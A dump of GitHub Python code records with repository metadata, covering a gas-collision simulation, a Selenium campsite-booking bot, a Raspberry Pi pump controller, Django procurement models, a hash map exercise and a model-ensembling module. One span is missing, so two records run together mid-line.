vc[i])))\n\n # Store\n self.obstacles.append({'vertices': vc, 'edges': edges})\n\n def update_stats(self):\n \"\"\"\n Update statistics\n \"\"\"\n vmag = np.sqrt((self.v**2).sum(axis=1))\n self.v2max = max(self.v2max, vmag.max())\n self.vxmax = max(self.vxmax, self.v[:, 0].max())\n self.vxmin = min(self.vxmin, self.v[:, 0].min())\n self.vymax = max(self.vymax, self.v[:, 1].max())\n self.vymin = min(self.vymin, self.v[:, 1].min())\n\n def step(self):\n \"\"\"\n Move by one step\n \"\"\"\n # Increment\n self.i += 1\n self.r += self.dt * self.v\n self.t += self.dt\n\n # Process collisions\n self.walls(self._walls_callback)\n self.collide(callback=self._collision_callback)\n self.obs_collide(self._obs_callback)\n\n # Update statistics\n self.update_stats()\n\n def walls(self, callback=None):\n \"\"\"\n Process wall collisions.\n\n TODO: implement wall callback\n \"\"\"\n for dim in range(self.ndim):\n # \"Negative\" wall\n d0 = self.r[:, dim] - .5*self.d - self.bounds[dim][0]\n self.r[d0 < 0, dim] -= 2*d0[d0 < 0]\n self.v[d0 < 0, dim] *= -1\n # \"Positive\" wall\n d1 = self.r[:, dim] + .5*self.d - self.bounds[dim][1]\n self.r[d1 > 0, dim] -= 2*d1[d1 > 0]\n self.v[d1 > 0, dim] *= -1\n\n if self._pressure == dim:\n #self._pressure_t.append(self._pressure_t[-1] + self.dt)\n #self._wall_momentum.append(self._wall_momentum[-1] - 2 * sum(self.m[d1 > 0] * self.v[d1 > 0, dim]))\n #self._wall_momentum_theory.append(self._wall_momentum_theory[-1] + self.P*self.L[dim]*self.dt)\n self._pressure_t.append(self.t)\n self._wall_momentum.append(self._wall_momentum[-1] - 2 * sum(self.m[d1 > 0] * self.v[d1 > 0, dim]))\n self._wall_momentum_theory = self.P*self.L[dim]*self.t\n\n def obs_collide(self, callback=None):\n \"\"\"\n Process collisions with additional rectangular obstacles\n\n TODO: implement obstacle callback\n \"\"\"\n for obs in self.obstacles:\n vc = obs['vertices']\n ec = obs['edges']\n Nn = len(ec)\n\n nn = np.array([n for n,e in ec])\n\n # Find molecules that collided\n dw = np.array([np.dot(self.r, n) - .5*self.d - e for n, e in ec]).T\n hit = (dw < 0).all(axis=1)\n\n if not hit.any():\n # No particle collided\n continue\n\n Nh = hit.sum()\n\n # Work on subset\n r = self.r[hit]\n v = self.v[hit]\n d = self.d[hit]\n dw = dw[hit]\n\n # Find which facet was hit\n dta = dw / np.dot(v, nn.T)\n dta[dta < 0] = 1e12\n\n # Which wall was hit?\n wi = np.argmin(dta, axis=1)\n\n # How long ago?\n dt = np.min(dta, axis=1)\n\n # Backtrack\n rc = r - dt[:, None]*v\n\n # Process individually\n for i in range(Nh):\n rcc = rc[i]\n rr = r[i]\n vv = v[i]\n dd = d[i]\n\n # Check if we hit a corner\n vc0, vc1 = vc[wi[i]-1], vc[wi[i]]\n vcc = None\n if np.dot(rcc-vc0, vc1 - vc0) < 0:\n vcc = vc0\n elif np.dot(rcc-vc1, vc0 - vc1) < 0:\n vcc = vc1\n\n if vcc is not None:\n # Corner collision\n dr = rr - vcc\n\n ndv = norm(vv)\n ru = np.dot(vv, dr) / ndv\n b2 = ru**2 + .25*dd**2 - np.dot(dr, dr)\n if b2 < 0:\n # No collision - this should not happen\n continue\n\n ds = ru + sqrt(b2)\n dtc = ds / ndv\n drc = dr - vv * dtc\n\n # Store new values\n v[i] = vv - 2. * drc * np.dot(vv, drc) / np.dot(drc, drc)\n r[i] = rr + (v[i] - vv) * dtc\n\n else:\n # Edge collision\n v[i] -= 2 * np.dot(v[i], nn[wi[i]]) * nn[wi[i]]\n r[i] = rcc + dt[i]*v[i]\n\n # Put everything back in\n self.v[hit] = v\n self.r[hit] = r\n\n def collide(self, callback=None):\n \"\"\"\n Process eventual collisions\n\n callback, if not None, is a function with signature callback(self, particle_index1, particle_index2)\n and is called after updating positions and velocities.\n \"\"\"\n\n # Find colliding particles\n D = squareform(pdist(self.r))\n ind1, ind2 = np.where(D < .5*np.add.outer(self.d, self.d))\n unique = (ind1 < ind2)\n ind1 = ind1[unique]\n ind2 = ind2[unique]\n\n # Process collisions\n for p1, p2 in zip(ind1, ind2):\n\n # Initial parameters\n v1, v2 = self.v[p1], self.v[p2]\n r1, r2 = self.r[p1], self.r[p2]\n d1, d2 = self.d[p1], self.d[p2]\n m1, m2 = self.m[p1], self.m[p2]\n\n # Relative positions and velocities\n dv = v2-v1\n dr = r2-r1\n\n # Backtrack\n ndv = norm(dv)\n if ndv == 0:\n # Special case: overlapping particles with same velocities\n ndr = norm(dr)\n offset = .5*dr*(.5*(d1+d2)/ndr - 1.)\n self.r[p1] -= offset\n self.r[p2] += offset\n continue\n ru = np.dot(dv, dr)/ndv\n ds = ru + sqrt(ru**2 + .25*(d1+d2)**2 - np.dot(dr, dr))\n if np.isnan(ds):\n 1/0\n\n # Time since collision\n dtc = ds/ndv\n\n # New collision parameter\n drc = dr - dv*dtc\n\n # Center of mass velocity\n vcm = (m1*v1 + m2*v2)/(m1+m2)\n\n # Velocities after collision\n dvf = dv - 2.*drc * np.dot(dv, drc)/np.dot(drc, drc)\n v1f = vcm - dvf * m2/(m1+m2)\n v2f = vcm + dvf * m1/(m1+m2)\n\n # Backtracked positions\n r1f = r1 + (v1f-v1)*dtc\n r2f = r2 + (v2f-v2)*dtc\n\n # Update values\n self.r[p1] = r1f\n self.r[p2] = r2f\n self.v[p1] = v1f\n self.v[p2] = v2f\n\n if callback is not None:\n callback(self, p1, p2)\n","repo_name":"pierrethibault/thermosim","sub_path":"thermosim.py","file_name":"thermosim.py","file_ext":"py","file_size_in_byte":25227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"38571349842","text":"import re\r\nfo = open(\"prog.txt\", \"r+\") #opens a file\r\nstr = fo.read() \t\t\t #reads the file\r\nfo.close()\r\nwhile '$' in str:\r\n i=0;\r\n while i 0:\n selected_tf = click_zone(\"A\")\n elif empty_cnt_b > 0:\n selected_tf = click_zone(\"B\")\n elif empty_cnt_c > 0:\n selected_tf = click_zone(\"C\")\n\n return selected_tf\n\n\n# 최초 팝업을 클릭해서 없애고 예약을 위한 사이트 체크로 들어감\ndef execute():\n # 팝업 확인. 없을 수도 있음\n try:\n driver.find_element_by_xpath('/html/body/div[4]/div[2]/div/form/div/span/a').click()\n except:\n time.sleep(0.1)\n # 예약 사전 준비 및 사이트 확인\n while True:\n if prepare_for_reservation():\n reservation_click()\n break\n else:\n print(DU.get_now_datetime_string())\n time.sleep(1)\n \n # driver.close()\n\n\nif __name__ == \"__main__\":\n # 프로그램에서 예약할 사이트 인자 받아오기\n parser = argparse.ArgumentParser(description='Karaban Site Argument. A, B, C')\n parser.add_argument('--week', type=int, help='2 ~ 7')\n parser.add_argument('--yoil', type=int, help='Sun ... Sat: 1 ~ 7')\n args = parser.parse_args()\n\n list_args.append(args.week)\n list_args.append(args.yoil)\n print(f\"{list_args[0]}째주 {dict_yoil[list_args[1]]}요일\")\n\n execute()","repo_name":"etlers/python","sub_path":"reservation/karaban_cancel.py","file_name":"karaban_cancel.py","file_ext":"py","file_size_in_byte":8018,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15388060900","text":"import RPi.GPIO as GPIO\n\nclass PinController:\n def __init__(self):\n self.pump_one_pin = 12\n self.pump_two_pin = 10\n self.heater_pin = 8\n self.pump_one_state = GPIO.HIGH\n self.pump_two_state = GPIO.LOW\n self.heater_pin_state = GPIO.LOW\n self.pin_init()\n \n @staticmethod\n def cleanup():\n GPIO.cleanup()\n \n def get_pump_state(self, id):\n if id == \"1\":\n return bool(GPIO.input(self.pump_one_pin))\n elif id == \"2\":\n return bool(GPIO.input(self.pump_two_pin))\n \n def cycle_pump_state(self, id):\n if id == \"1\":\n self.cycle_pump_one()\n return bool(GPIO.input(self.pump_one_pin))\n elif id == \"2\":\n self.cycle_pump_two()\n return bool(GPIO.input(self.pump_two_pin))\n\n def cycle_pump_one(self):\n if GPIO.input(self.pump_one_pin) == GPIO.HIGH:\n GPIO.output(self.pump_one_pin, GPIO.LOW)\n else:\n GPIO.output(self.pump_one_pin, GPIO.HIGH)\n\n def cycle_pump_two(self):\n if GPIO.input(self.pump_two_pin) == GPIO.HIGH:\n GPIO.output(self.pump_two_pin, GPIO.LOW)\n else:\n GPIO.output(self.pump_two_pin, GPIO.HIGH)\n\n def cycle_heater(self, state):\n if state == GPIO.HIGH and self.pump_one_state == GPIO.HIGH:\n GPIO.output(self.heater_pin, GPIO.HIGH)\n elif state == GPIO.HIGH and self.pump_one_state == GPIO.LOW:\n raise Exception\n elif state == GPIO.LOW:\n GPIO.output(self.heater_pin, GPIO.LOW)\n\n def get_heater_pin(self):\n return self.heater_pin\n\n \n def pin_init(self):\n GPIO.setmode(GPIO.BOARD)\n GPIO.setup([self.pump_one_pin, self.pump_two_pin, self.heater_pin], GPIO.OUT, initial=GPIO.LOW)\n","repo_name":"whatisbyandby/brewhouse-controller","sub_path":"pin_controller.py","file_name":"pin_controller.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22941836521","text":"#######################################\r\n# Copyright (C) 2020-2023 Otmar Ertl. #\r\n# All rights reserved. #\r\n#######################################\r\n\r\nlightblue = \"#a6cee3\"\r\ndarkblue = \"#1f78b4\"\r\nlightgreen = \"#b2df8a\"\r\ndarkgreen = \"#33a02c\"\r\nlightred = \"#fb9a99\"\r\ndarkred = \"#e31a1c\"\r\nlightorange = \"#fdbf6f\"\r\ndarkorange = \"#ff7f00\"\r\nlightviolet = \"#cab2d6\"\r\ndarkviolet = \"#6a3d9a\"\r\nyellow = \"#ffff99\"\r\nbrown = \"#b15928\"\r\n\r\ncolors = {\r\n \"TreeMinHash\": darkblue,\r\n \"BagMinHash1\": darkorange,\r\n \"BagMinHash2\": darkgreen,\r\n \"BagMinHash1a\": lightviolet,\r\n \"DartMinHash\": darkorange,\r\n \"ICWS\": darkred,\r\n \"TreeMinHash1\": brown,\r\n \"TreeMinHash1a_0.5_0.9\": yellow,\r\n \"TreeMinHash1a_0.5_0.99\": darkblue,\r\n \"TreeMinHash1a_0.7_0.99\": darkorange,\r\n \"TreeMinHash1a_0.3_0.99\": darkviolet,\r\n \"TreeMinHash1x\": lightgreen,\r\n \"TreeMinHash1a\": darkred,\r\n \"TreeMinHash1_NonStreaming\": lightorange,\r\n}\r\n","repo_name":"oertl/treeminhash","sub_path":"python/color_defs.py","file_name":"color_defs.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"25808642150","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.models as models\nimport include.extractors as resnetextractor\nfrom PIL import Image\n\nnorm_mean = [0.485, 0.456, 0.406]\nnorm_std = [0.229, 0.224, 0.225]\n\ntransform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(norm_mean, norm_std),\n])\n\nwith open('imagenet_classes.txt') as f:\n classes = [line.strip() for line in f.readlines()]\n\ndevice = torch.device(\"cpu\")\nnet = models.resnet50(pretrained=True)\nnet = resnetextractor.ResnetFeatureExtractor(net)\nnet.to(device)\nnet.eval()\n\ndataset = []\nimg = Image.open(\"dog.jpg\")\nimg_t = transform(img)\nbatch_t = torch.unsqueeze(img_t, 0)\ndataset.append(batch_t)\n\n# 使用torch.no_grad的话在前向传播中不记录梯度,节省内存\nwith torch.no_grad():\n for data in dataset:\n # 预测\n data = data.to(device)\n outputs = net(data)\n _, indices = torch.sort(outputs[-1], descending=True)\n percentage = torch.nn.functional.softmax(outputs[-1], dim=1)[0] * 100\n print(outputs)\n print([(classes[idx], percentage[idx].item()) for idx in indices[0][:5]])\n","repo_name":"KunWuLuan/newStory","sub_path":"result_of_all_layers.py","file_name":"result_of_all_layers.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3191418053","text":"n=input()\ns=['a','e','i','o','u']\ng=['A','E','I','O','U']\nl=[]\nm=[]\nk=[]\nfor i in n:\n if i in s:\n l.append(i)\n elif i in g:\n m.append(i)\nfor i in l:\n if i not in k and i in s:\n k.append(i)\nif len(k)==len(s):\n print(\"True\")\nelse:\n print(\"False\")\n \n \n \n ","repo_name":"Gopal-123/codemind-python","sub_path":"All_vowels_in_a_string.py","file_name":"All_vowels_in_a_string.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4112923278","text":"import datetime\n\nfrom django.db import models\nfrom django.utils import timezone\n\nchoices_etiqueta = (\n ('radio', 'Rádio'),\n ('telefonia', 'Telefonia'),\n ('audioevideo', 'Áudio e Vídeo'),\n ('outros', 'Outros')\n)\n\nchoices_nat = (\n ('material', 'Material'),\n ('servico', 'Serviço'),\n ('materialservico', 'Material/Serviço')\n)\n\nchoice_nat_desp = (\n ('custeio', 'Custeio'),\n ('capital', 'Capital'),\n ('custeio/capital', 'Custeio/Capital')\n)\n\nchoice_status_receita = (\n ('adescentralizar', 'A descentralizar'),\n ('descentralizado', 'Descentralizado'),\n ('empenhado', 'Empenhado'),\n ('recolhido', 'Recolhido'),\n ('remanejado', 'Remanejado'),\n ('cancelado', 'Cancelado'),\n)\n\n\nclass Projeto(models.Model):\n\n titulo = models.CharField(max_length=100)\n responsavel = models.CharField(max_length=100, blank=True, null=True)\n descricao = models.TextField(blank=True, null=True)\n etiqueta = models.CharField(max_length=20, choices=choices_etiqueta)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.titulo\n\n\nclass HistoricoDocacaoOrcamentaria(models.Model):\n choice_acao = (\n ('env', 'envio'),\n ('aum', 'aumento'),\n ('red', 'redução'),\n ('reb', 'rebalanceamento')\n )\n acao = models.CharField(max_length=20, choices=choice_acao)\n detalhamento = models.TextField(blank=True, null=True)\n data_acao = models.DateField(blank=True, null=True)\n pacote_empenho = models.ForeignKey(\n 'DotacaoOrcamentaria', on_delete=models.CASCADE, related_name='historico_dotacoes_orcamentarias', null=True)\n\n def __str__(self):\n return self.elemento_item\n\n\nclass DotacaoOrcamentaria(models.Model):\n choices_origem = (\n ('CSM', '1400011 - CSM'),\n ('Aj-Geral', '1400005 - Aj-Geral'),\n ('ABM', '1400017 - ABM'),\n ('DLF', 'USDO 1400018 - DLF'),\n ('1ºBBM', '1400006 - 1ºBBM'),\n ('3ºBBM', '1400008 - 3ºBBM'),\n ('USDO GOL', '1400018 - USDO GOL'),\n ('4ºCOB', '1400034 - 4ºCOB'),\n ('BOA', '1400019 - BOA'),\n ('2ºCOB', '1400021 - 2ºCOB'),\n ('8ºBBM', '1400014 - 8ºBBM'),\n ('5ºBBM', '1400010 - 5ºBBM'),\n ('12ºBBM', '1400027 - 12ºBBM'),\n ('3ºCOB', '1400023 - 3ºCOB'),\n ('5ºCOB', '1400029 - 5ºCOB'),\n ('6ºCOB', '1400030 - 6ºCOB'),\n )\n acao = models.CharField(max_length=100, blank=True, null=True)\n fonte = models.CharField(max_length=100, blank=True, null=True)\n elemento_item = models.CharField(max_length=100, blank=True, null=True)\n conta = models.CharField(max_length=100, blank=True, null=True)\n data = models.DateField(blank=True, null=True)\n natureza_desp = models.CharField(\n max_length=20, choices=choice_nat_desp, blank=True, null=True)\n unid_origem = models.CharField(\n max_length=50, choices=choices_origem, blank=True, null=True)\n unid_destino = models.CharField(\n max_length=50, choices=choices_origem, blank=True, null=True)\n valor = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n doc_ref = models.CharField(max_length=100, blank=True, null=True)\n status = models.CharField(\n max_length=20, choices=choice_status_receita, blank=True, null=True)\n desc = models.TextField(blank=True, null=True)\n pacote_empenho = models.ForeignKey(\n 'PacoteEmpenho', on_delete=models.CASCADE, related_name='dotacoes_orcamentarias', null=True)\n\n def __str__(self):\n return str(self.valor)\n\n\nclass EquipamentoServico(models.Model):\n\n choices_sit = (\n ('ativo', 'Ativo'),\n ('inativo', 'Inativo'),\n ('suspenso', 'Suspenso')\n )\n choices_classe = (\n ('consumo', 'Consumo'),\n ('permanente', 'Permanente')\n )\n\n natureza = models.CharField(max_length=20, choices=choices_nat)\n titulo = models.CharField(max_length=100)\n especificacao = models.TextField(blank=True, null=True)\n registro_preco = models.CharField(max_length=10, blank=True, null=True)\n codigo_item = models.CharField(max_length=10, blank=True, null=True)\n elemento_item = models.CharField(max_length=8, blank=True, null=True)\n classe = models.CharField(max_length=10, choices=choices_classe)\n valor_portal = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n situacao = models.CharField(\n max_length=20, choices=choices_sit, blank=True, null=True)\n\n def __str__(self):\n return self.titulo\n\n\nclass Tasks_Cronograma(models.Model):\n choices_status = (\n ('pendente', 'Pendente'),\n ('emexecucao', 'Em execução'),\n ('concluido', 'Concluído')\n )\n choices_prioridade = (\n ('baixa', 'Baixa'),\n ('media', 'Média'),\n ('alta', 'Alta')\n )\n titulo = models.CharField(max_length=100)\n descricao = models.TextField()\n status = models.CharField(max_length=20, choices=choices_status)\n prioridade = models.CharField(max_length=20, choices=choices_prioridade)\n data_inicio_planejada = models.DateField(blank=True, null=True)\n data_fim_planejada = models.DateField(blank=True, null=True)\n data_inicio_real = models.DateField(blank=True, null=True)\n data_fim_real = models.DateField(blank=True, null=True)\n observacoes = models.TextField(blank=True, null=True)\n pacote = models.ForeignKey(\n 'PacoteAquisicao', on_delete=models.CASCADE, related_name='tasks', null=True)\n\n def __str__(self):\n return self.titulo\n\n def diferenca_de_dias(self):\n data_inicio_c = self.data_inicio_real if self.data_inicio_real else self.data_inicio_planejada\n data_fim_c = self.data_fim_real if self.data_fim_real else self.data_fim_planejada\n if data_inicio_c == '' or data_fim_c == '':\n return 0\n diff = data_fim_c - data_inicio_c\n\n return diff.days\n\n\nclass Orcamento(models.Model):\n empresa = models.CharField(max_length=100)\n data = models.DateField(blank=True, null=True)\n arquivos = models.CharField(max_length=100)\n\n def __str__(self):\n return self.empresa\n\n\nclass ObservacaoPendencia(models.Model):\n choices_categorias = (\n ('pendencia', 'Pendência'),\n ('observacao', 'Observação'),\n )\n choices_class = (\n ('aconcluir', 'A concluir'),\n ('concluido', 'Concluído'),\n )\n decricao = models.TextField(blank=True, null=True)\n categoria = models.CharField(max_length=20, choices=choices_categorias)\n data_obs_pend = models.DateField(blank=True, null=True)\n class_obs_pend = models.CharField(max_length=20, choices=choices_class)\n pacote_despesa = models.ForeignKey(\n 'PacoteAquisicao', on_delete=models.CASCADE, related_name='observacoes_pendencias', null=True)\n\n\nclass PacoteAquisicao(models.Model):\n\n choices_fase = (\n ('PJ', 'Planejamento'),\n ('RP', 'RP em andamento'),\n ('PG', 'PG em andamento'),\n ('EMP', 'Empenhado'),\n ('AGE', 'Aguardando entrega'),\n ('ENT', 'Entregue'),\n ('INS', 'Instalado')\n )\n\n choices_esp_fase = (\n ('rp-etp', 'Elaboração do ETP'),\n ('rp-orcamentos', 'Obtenção de Orçamentos'),\n ('rp-precos', 'Mapa de Preços'),\n ('rp-autorizacao-dlf', 'Pedido de autorização DLF'),\n ('rp-gestao', 'Solicitação de Gestão de RP'),\n ('rp-minuta', 'Elaboração Minuta do Termo de Referência'),\n ('rp-correcao-minuta', 'Correção Minuta do Termo de Referência (ASSJUR)'),\n ('rp-correcao-etp', 'Correção ETP (ASSJUR)'),\n ('rp-formulario-adesao', 'Formulário de Adesão'),\n ('rp-encaminhado-gol', 'Encaminhado a Gol'),\n ('rp-impugnacao', 'Respondendo impugnação'),\n ('rp-resposta-documentacao', 'Resposta a documentação'),\n ('pg-autorizacao-dlf', 'Pedido de autorização DLF'),\n ('pg-etp', 'Elaboração do ETP'),\n ('pg-orcamentos', 'Obtenção de Orçamentos'),\n ('pg-precos', 'Mapa de Preços'),\n ('pg-minuta', 'Elaboração Minuta do Termo de Referência'),\n ('pg-extrato', 'Extrato de Crédito'),\n ('pg-correcao-minuta', 'Correção Minuta do Termo de Referência (ASSJUR)'),\n ('pg-correcao-etp', 'Correção ETP (ASSJUR)'),\n ('Terceiros', 'Terceiros'),\n )\n\n titulo = models.CharField(max_length=100)\n status = models.CharField(\n max_length=100, choices=choices_fase, blank=True, null=True)\n fase = models.CharField(\n max_length=100, choices=choices_esp_fase, blank=True, null=True)\n etiqueta = models.CharField(\n max_length=20, choices=choices_etiqueta) # Vai vir via url\n natureza = models.CharField(max_length=20, choices=choices_nat)\n contrato = models.CharField(max_length=100, blank=True, null=True)\n contratoinit = models.DateField(blank=True, null=True)\n contratoend = models.DateField(blank=True, null=True)\n doc_ref = models.CharField(max_length=100, blank=True, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n projeto = models.ForeignKey(\n Projeto, on_delete=models.CASCADE, related_name='pacote_aquisicao')\n\n def __str__(self):\n return self.titulo\n\n\nclass PacoteAquisicaoEquipamentoServico(models.Model):\n\n choices_entrega_instalacao = (\n ('demanda', 'Demanda'),\n ('licitacao', 'Licitacao'),\n ('aentregar', 'A entregar'),\n ('entregue', 'Entregue'),\n ('ainstalar', 'A instalar'),\n ('instalado', 'Instalado')\n )\n pacoteaquisicao = models.ForeignKey(\n PacoteAquisicao, on_delete=models.CASCADE, related_name='aquisicao_equipamento')\n equipamento = models.ForeignKey(\n EquipamentoServico, on_delete=models.CASCADE, related_name='pacote_equipamento')\n valor_1 = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n valor_2 = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n valor_3 = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n valor_medio = models.DecimalField(\n max_digits=10, decimal_places=2, blank=True, null=True)\n usa_preco_portal = models.BooleanField(default=False)\n entrega_instalacao = models.CharField(\n max_length=20, choices=choices_entrega_instalacao)\n data_entrega = models.DateField(blank=True, null=True)\n data_instalacao = models.DateField(blank=True, null=True)\n observacoes = models.TextField(blank=True, null=True)\n local = models.CharField(max_length=100) # Define as per your needs\n destino = models.CharField(max_length=100) # Define as per your needs\n quantidade = models.IntegerField(default=1)\n\n def __str__(self):\n return self.equipamento.titulo\n\n\nclass PacoteEmpenho(models.Model):\n choices_tipo_pacote = (\n ('despesa', 'Despesa'),\n ('receita', 'Receita')\n )\n titulo = models.CharField(max_length=100)\n descricao = models.TextField(blank=True, null=True)\n etiqueta = models.CharField(\n max_length=20, choices=choices_etiqueta, blank=True, null=True)\n natureza = models.CharField(max_length=20, choices=choices_nat)\n tipo_pacote = models.CharField(\n max_length=20, choices=choices_tipo_pacote, blank=True, null=True)\n documento_ref = models.CharField(max_length=100, blank=True, null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n projeto = models.ForeignKey(Projeto, on_delete=models.CASCADE, related_name='pacote_empenho')\n\n def __str__(self):\n return self.titulo\n","repo_name":"cleytonfs777/sdtsmanagerfull","sub_path":"projetos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11781,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"498026024","text":"from sys import stdin\n\nclass Node:\n def __init__(self, key, value, next):\n self.key = key\n self.value = value\n self.next = next\n\ndef my_hash(s):\n h = 0\n for c in s:\n h = (1_000_003 * h + ord(c)) % (2 ** 32)\n return h\n\nclass HashMap:\n def __init__(self):\n self.a = 5 * [None]\n self.count = 0\n \n def find(self, key):\n b = my_hash(key) % len(self.a)\n n = self.a[b]\n while n != None:\n if n.key == key:\n break\n n = n.next\n return n\n \n def insert(self, key, value):\n b = my_hash(key) % len(self.a)\n self.a[b] = Node(key, value, self.a[b]) # prepend\n \n def rehash(self):\n old = self.a\n self.a = (2 * len(self.a)) * [None]\n print(f'resizing to {len(self.a)} buckets')\n for head in old:\n n = head\n while n != None:\n self.insert(n.key, n.value)\n n = n.next\n \n def set(self, key, value):\n n = self.find(key)\n if n != None:\n n.value = value\n else:\n if self.count >= len(self.a) * 4:\n self.rehash()\n self.insert(key, value)\n self.count += 1\n \n def get(self, key):\n n = self.find(key)\n if n != None:\n return n.value\n else:\n return None\n \n def remove(self, key):\n b = my_hash(key) % len(self.a)\n if self.a[b] == None:\n return\n n = self.a[b]\n if n.key == key:\n self.a[b] = n.next\n return\n while n.next != None:\n if n.next.key == key:\n n.next = n.next.next\n self.count -= 1\n return\n n = n.next\n\nm = HashMap()\n\nwhile True:\n line = stdin.readline()\n if line.strip() == '== END ==':\n break\n word = ''\n for c in line:\n if 'a' <= c <= 'z' or 'A' <= c <= 'Z':\n word += c.lower()\n elif word:\n count = m.get(word)\n if count:\n m.set(word, count + 1)\n else:\n m.set(word, 1)\n word = ''\n\nprint('unique words =', m.count)\n\nfor line in stdin:\n word = line.strip()\n count = m.get(word)\n if count:\n print(word, count)\n m.remove(word)\n else:\n print(word, 'None')\n","repo_name":"nyhead/intro-to-algo-NPRG062","sub_path":"hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11603117987","text":"from enum import Enum\nimport models\nfrom fusion_strategies import BasicFusion, CompetenceFusion\n\n\nclass VoteMode(Enum):\n \"\"\"\n vote mode enumerate\n \"\"\"\n majority = 1\n one_vote_positive = 2\n one_vote_negative = 3\n average_score = 4\n max_score = 5\n competence_fusion = 6\n most_competence = 7\n highest_in_top_competences = 8\n\n\nclass Ensembler(object):\n \"\"\"\n the abstract class for ensemble learning\n \"\"\"\n def __init__(self):\n self._models = []\n self._model2weights = {}\n\n def add_model(self, prediction_model, weight=1):\n self._models.append(prediction_model)\n self._model2weights[prediction_model.id] = weight\n\n def adjust_severity_weight(self, outcome_severity, severity_conf):\n # normalise severity score\n m2s = {}\n max_score = 0\n for m in self._models:\n m2s[m.id] = severity_conf[m.outcome] / outcome_severity\n max_score = max(max_score, m2s[m.id])\n\n for m in self._models:\n self._model2weights[m.id] = (m2s[m.id] / max_score) * self._model2weights[m.id]\n\n def predict(self, x):\n models.PredictionModel.check_x(x)\n pass\n\n def predict_probs(self, x):\n pass\n\n @property\n def model2weight(self):\n return self._model2weights\n\n @property\n def models(self):\n return self._models\n\n\nclass BasicEnsembler(Ensembler):\n \"\"\"\n a basic ensembler implemented a set of fusion strategies\n \"\"\"\n def __init__(self):\n self._mode = VoteMode.one_vote_positive\n self._competence_assessor = None\n super(BasicEnsembler, self).__init__()\n\n @property\n def mode(self):\n return self._mode\n\n @mode.setter\n def mode(self, v):\n self._mode = v\n\n def get_competence_assessor(self):\n \"\"\"\n get competence assessor\n :return:\n \"\"\"\n if self._competence_assessor is None:\n self._competence_assessor = DistBasedAssessor(self.models)\n return self._competence_assessor\n\n def predict(self, x, threshold=0.5):\n \"\"\"\n predict binary output\n :param x: the data frame\n :param threshold: threshold for prob cut-off in models predicting probabilities\n :return:\n \"\"\"\n preds = []\n for m in self.models:\n dist = m.model_data['cohort_variable_distribution']\n di = models.DistributionImputator(dist)\n imputed_x = di.impute(x, variables=[k for k in dist])\n if self.mode in [VoteMode.average_score, VoteMode.max_score]:\n preds.append(m.predict_prob(imputed_x))\n else:\n preds.append(m.predict(imputed_x, threshold=threshold))\n if self.mode == VoteMode.majority:\n return BasicFusion.majority(preds)\n elif self.mode == VoteMode.one_vote_positive:\n return BasicFusion.one_vote(preds, positive=True)\n elif self.mode == VoteMode.average_score:\n return BasicFusion.score_fuse(preds, threshold=threshold)\n elif self.mode == VoteMode.max_score:\n return BasicFusion.score_fuse(preds, max_fuse=True, threshold=threshold)\n elif self.mode == VoteMode.competence_fusion:\n return CompetenceFusion.score_fuse_by_competence(x, preds, self.models,\n self.get_competence_assessor(), threshold=threshold)\n else:\n return BasicFusion.one_vote(preds, positive=False)\n\n def predict_probs(self, x):\n \"\"\"\n predict probabilities\n :param x: the data frame of data to be predicted\n :return:\n \"\"\"\n if self.mode not in [VoteMode.average_score, VoteMode.max_score, VoteMode.most_competence,\n VoteMode.competence_fusion, VoteMode.highest_in_top_competences]:\n raise Exception('only certain modes can predict probs')\n preds = []\n weights = []\n for m in self.models:\n dist = m.model_data['cohort_variable_distribution']\n di = models.DistributionImputator(dist)\n imputed_x = di.impute(x, variables=[k for k in dist])\n preds.append(m.predict_prob(imputed_x))\n weights.append(self.model2weight[m.id])\n use_max = self.mode == VoteMode.max_score\n if self.mode == VoteMode.competence_fusion:\n return CompetenceFusion.score_fuse_by_competence(x, preds, self.models,\n self.get_competence_assessor(),\n weight_by_competence=True,\n default_weights=weights)\n elif self.mode == VoteMode.most_competence:\n return CompetenceFusion.predict_by_most_competent(x, preds, self.models,\n self.get_competence_assessor())\n elif self.mode == VoteMode.highest_in_top_competences:\n return CompetenceFusion.predict_by_highest_risk(x, preds, self.models,\n self.get_competence_assessor())\n return BasicFusion.score_fuse(preds, max_fuse=use_max, use_score=True, weights=weights)\n\n\nclass PredictorCompetenceAssessor(object):\n \"\"\"\n an abstract competence assessor class\n \"\"\"\n def __init__(self, models):\n self._models = models\n self._default_model_index = None\n\n def default_selection(self):\n if self._default_model_index is None:\n lst = [(idx, self._models[idx].model_data['provenance']['derivation_cohort']['N'])\n for idx in range(len(self._models))]\n lst = sorted(lst, key=lambda t:-t[1])\n self._default_model_index = lst[0][0]\n return self._default_model_index, lst\n\n def evaluate(self, 